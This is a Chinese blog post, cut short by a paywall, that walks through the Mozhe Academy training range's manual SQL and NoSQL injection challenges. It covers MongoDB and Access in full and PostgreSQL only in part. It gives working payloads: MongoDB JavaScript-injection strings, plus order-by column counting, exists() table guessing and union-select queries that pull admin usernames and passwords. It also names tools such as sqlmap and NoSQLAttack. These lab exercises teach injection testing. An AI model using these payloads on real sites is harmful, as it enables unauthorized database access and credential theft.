SQL手工注入漏洞测试-MongoDB数据库注入-Access数据库注入-PostgreSQL数据库注入-Sql Server数据库注入-Oracle数据库注入

最新推荐文章于 2025-11-09 10:35:29 发布
原创 最新推荐文章于 2025-11-09 10:35:29 发布 · 420 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #数据库 #网络安全

本文围绕SQL手工注入漏洞测试展开,介绍了MongoDB、Access、PostgreSQL、Sql Server和Oracle数据库的注入测试方法。包括打开靶场环境、测试注入点、判断字段个数等步骤,还提及了可使用的注入工具,如NoSQLAttack、sqlmap、Pangolin等。

SQL手工注入漏洞测试

目录


靶场地址: 墨者学院

MongoDB数据库注入

打开靶场进入环境

image-20230815092940670

点击此处跳转界面

image-20230815093036433

通过观察url信息,测试注入点

单引号找测试注入点
?id=1'
页面发生变化
构造简单的回显点
构造简单的链接测试回显:
?id=1'}); return ({
   
   title:1,content:'2

image-20230815093317765

爆库:
?id=1'}); return ({title:tojson(db),content:'1

image-20230815093403688

db.getCollectionNames()返回的是数组,需要用tojson转换为字符串。并且mongodb函数区分大小写
爆表:
?id=1'}); return ({title:tojson(db.getCollectionNames()),content:'1  查询有的集合(集合相当于mysql的表)

image-20230815093457086

爆字段:
?id=1'}); return ({title:tojson(db.Authority_confidential.find()[0]),content:'1
db.Authority_confidential是当前用的集合(表),find函数用于查询,0是第一条数据

image-20230815093617714

第二条数据:

image-20230815093942893

注意在查询字段过程当中要加上tojson进行转换,否则无法正常回显数据

image-20230815093738934

将得到的密码进行MD5解密即可,登录即可获得KEY

使用工具也可进行注入,由于sqlmap不支持MongoDB,所以可以使用NoSQLAttack工具进行注入:

工具下载地址:NoSQLAttack

具体使用参考官方文档即可

参考文档:MongoDB注入

菜鸟教程:MongoDB 查询文档

Access数据库注入

access数据库结构:

表名---->列名---->内容数据 不像其他的数据库一样、里面创建多个数据库然后才是表再是内容,而access的话只有若干张表。注入时获取表面和内容的字段信息靠猜或爆破

打开靶场进入环境

image-20230815101741694

点击此处跳转

image-20230815101821904

测试注入,观察回显是否正常

and 1=1 回显正常
and 1=2 回显不正常
或随便输入数值 回显不正常
加入单引号回显不正常

判断字段个数

order by 1 回显正常
order by 2 回显正常
order by 3 回显正常
order by 4 回显正常
order by 5 回显不正常,说明有4列字段

猜表名,看是否存在user,admin,show等敏感信息表,靠猜或者使用bp爆破

?id=1 and exists(select * from user)  测试是否存在user 
回显不正常,说明不存在
?id=1 and exists(select * from admin)  测试是否存在admin
回显正常说明存在

image-20230815103220775

image-20230815103244003

存在admin表,测回显位置
?id=1 union select 1,2,3,4 from admin

image-20230815103352832

接下来猜字段
and exists (select id from admin)
回显正常说明存在
逐一验证id,user,username,passwd,password等敏感字段是否存在,猜测或者bp爆破
回显正常则存在该字段,不正常说明不存在该字段

以此类推去猜测即可

爆字段的值
union select 1,username,passwd,id from admin

image-20230815104009953

成功获取用户名和密码,MD5解密,登录即可获得KEY

也可以使用工具:Pangolin

image-20230815105013357

选中想要的数据过后,开始执行,等待过后即可获取

image-20230815105128674

PostgreSQL数据库注入

打开靶场进入环境

image-20230815110010000

测试注入点

image-20230815110042388

判断注入点
and 1=1 回显正常
and 1=2 回显不正常
加单引号无回显

image-20230815110314899

判断字段的个数

?id=1 order by 1 回显正常
?id=1 order by 2 回显正常
?id=1 order by 3 回显正常
?id=1 order by 4 回显正常
?id=1 order by 5 无回显
说明有4列字段

image-20230815110529344

判断回显点

?id=-1 union select 1,2,3,4 无回显
?id=-1 union select
最低0.47元/天 解锁文章
SQL注入漏洞的检测及防御方法
leyang0910的博客
12-07 1201
SQL注入是一种攻击技术,攻击者通过在输入字段中插入恶意SQL代码,试图欺骗应用程序以执行不安全数据库操作。这些恶意SQL代码将与应用程序的数据库进行交互,允许攻击者执行未授权的操作。SQL注入攻击通常针对使用动态SQL查询的Web应用程序,这些查询构建在未正确过滤或验证用户输入的基础上。SQL注入攻击通常涉及使用单引号、双引号、注释符号和逻辑运算符等特殊字符,以绕过应用程序的输入验证,构造恶意SQL查询。成功的攻击可能导致数据库泄漏、数据破坏、未授权访问、甚至完整的数据库服务器控制。
SQL手工注入MongoDB数据库
小千安全
01-28 2186
MongoDB语法跟其它数据库有所区别 具体参考:https://www.runoob.com/mongodb/mongodb-query.html 环境 墨者靶场 SQL手工注入漏洞测试(MongoDB数据库) 思路 题目代码给出了列名 如果语句这样写/new_list.php?id=1 order by 2 代码接收db.notice.findOne({‘id’:‘1 order by 2’}); return data; 并没有闭合,注入语句无法生效 想办法闭合语句,查看所有集合 注入语句 都是
数据库测试SQL注入测试——一般步骤方法
u013177528的博客
04-24 2069
SQL注入是一种常见的网络攻击手段,攻击者通过在Web应用程序的输入字段中注入恶意SQL代码,来利用不安全数据库查询。SQL注入测试的目的是验证应用程序是否能够抵御这类攻击。SQL注入测试Web应用安全测试的重要组成部分,它有助于确保应用程序的安全性和数据的完整性。记录测试过程中发现的所有问题,并与开发团队合作修复这些漏洞。
SQL注入实验详细过程及讲解
2302_78587828的博客
08-14 2699
SQL 注入攻击是通过将恶意的SQL查询或添加语句插入到应用的输入参数中,再在后台SQL服务器上解析执行进行的攻击,它目前黑客对数据库进行攻击的最常用手段之一。
sql注入测试方法,零基础入门到精通,收藏这篇就够了
最新发布
weixin_57514792的博客
11-09 1006
sql注入测试方法,零基础入门到精通,收藏这篇就够了
墨者学院刷题笔记——SQL手工注入漏洞测试(MongoDB数据库)
永远是少年
07-15 760
今天继续给大家介绍Linux运维相关知识,本文主要内容是SQL手工注入漏洞测试(MongoDB数据库)。 一、题目简介 二、漏洞利用
精选资源
SQL手工注入大全:包含各种类型的SQL注入,实现手工注入的乐趣,此资源你值得拥有。
05-31
宽字节注入SQL手工注入漏洞测试(Oracle数据库)、SQL手工注入漏洞测试(Sql Server数据库)、SQL手工注入漏洞测试(Access数据库)、SQL手工注入漏洞测试(PostgreSQL数据库)、SQL手工注入漏洞测试(MongoDB数据库)、SQL...
全面掌握SQL手工注入技术,多数据库环境下的注入技巧详解
它包含了不同数据库系统如OracleSql ServerAccessPostgreSQLMongoDB、Sybase、SQLite、Db2以及MySQL等的SQL注入测试方法。此外,还涉及到参数加密、delete注入、过滤字符后手工注入漏洞测试和延时注入(时间...
B站小迪安全笔记第十五天-SQL注入OraclemongoDB注入
m0_61530426的博客
07-29 768
B站小迪安全笔记
小迪安全第15天 web漏洞,SQL注入Oracle,mongoDB注入
qq_46116117的博客
12-23 2865
15 web漏洞,SQL注入Oracle,mongoDB注入 补充: json JSON数据与常规数据的数据表达形式不同 常规注入,在a=1后直接进行测试 JSON注入,需要在JSON数据中进行测试 简要学习各种数据库注入特点 常见数据库Access,Mysql,mssqlmongoDBpostgresqlsqlite,oracle,sybase等 Access 表名 列名 数据 Acce
SQL手工注入漏洞测试(MongoDB数据库)——墨者学院
A2893992091的博客
08-20 485
表有:Authority_confidential、notice、system.indexes。
sql注入检测
02-02
sql注入字典,比较普遍,建议下载试用下,有啥好的意见可以分享下
墨者靶场-SQL手工注入漏洞测试(MongoDB数据库)
Sa1nZen的博客
08-26 367
墨者靶场-SQL手工注入漏洞测试(MongoDB数据库)
SQL手工注入漏洞测试(MongoDB数据库)
m0_75036923的博客
08-20 1072
可以在此来显示想要查询的数据。通过回显观察到数据库为 mozhe_cms_Authority 其中tojson是可以把数据变成 json型数据,db为取当前数据库,即当前的数据库为 mozhe_cms_Authority。五.最终我们就可以获得数据了,将密码进⾏MD5解密,返回登录⻚进⾏登录,划倒⻚⾯最下 端就可以看到KEY了。三.得到数据库名之后就可以尝试爆出数据库下的表名了且构造Payload...其中db.getColl ectionNames() 返回⼀个包含当前数据库中所有集合名称的数组。
墨者 - SQL手工注入漏洞测试(MongoDB数据库)
吃肉唐僧的博客
07-10 2814
Mongodb语法 在做之前,先了解下相关语法。Mongodb的查询文档方式与其他的数据库略微不同,当进行条件查询的时候,mysql是用where,而mongodb是以键值对形式进行查询的 因为mongodb的数据储存方式: 具体可以参考菜鸟教程:https://www.runoob.com/mongodb/mongodb-query.html 好,对数据结构有个简单了解后...
墨者学院:SQL手工注入漏洞测试(MongoDB数据库)
qujian9795的博客
07-14 197
return ({'title':tojson(db.Authority_confidential.find()[0]),'content':'2 //查询表的字段的值。return ({'title':tojson(db.getCollectionNames()),'content':'2 //查询表名称。return ({'title':'1','content':'2 //判断回显位置。
墨者SQL手工注入漏洞测试(MongoDB数据库)题解
zr1213159840的博客
02-12 1920
题目的环境是Nginx+PHP+MongoDB。并且给了如下代码 在题目的考察知识点方面,说到了MD5值。 首先我们来打开链接,发现是用户登录界面(如果不是请稍等一会),然后和往常一样,点击那个通知,发现id的信息 我们读一下代码,在query这个部分,把id插入后,直接返回了查询的data。 用户输入的id的值没有经过任何转义就直接插入数据库中执行,在这个地方我们可以将id的值为 1'}); 这样查询语句就变成了 db.notice.find({'id':'1'})'}) 能看出后面的部分被过滤了
SQL注入测试
无极低码
03-29 921
根据识别出的注入点,构造特殊的输入字符串(payload),这些字符串包含SQL语法和控制逻辑,如单引号(')、双引号(")、分号(;这种测试模拟恶意用户向数据库查询中注入攻击性SQL代码的行为,以判断应用程序是否能够有效地防止未授权的数据访问、数据篡改或系统控制。使用自动化工具,如sqlmap、Burp Suite、OWASP ZAP等,可以更高效地进行SQL注入测试。如果应用程序的响应发生了变化,或者返回了异常的数据(如数据库结构、其他用户的数据等),则可能表明存在SQL注入漏洞。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值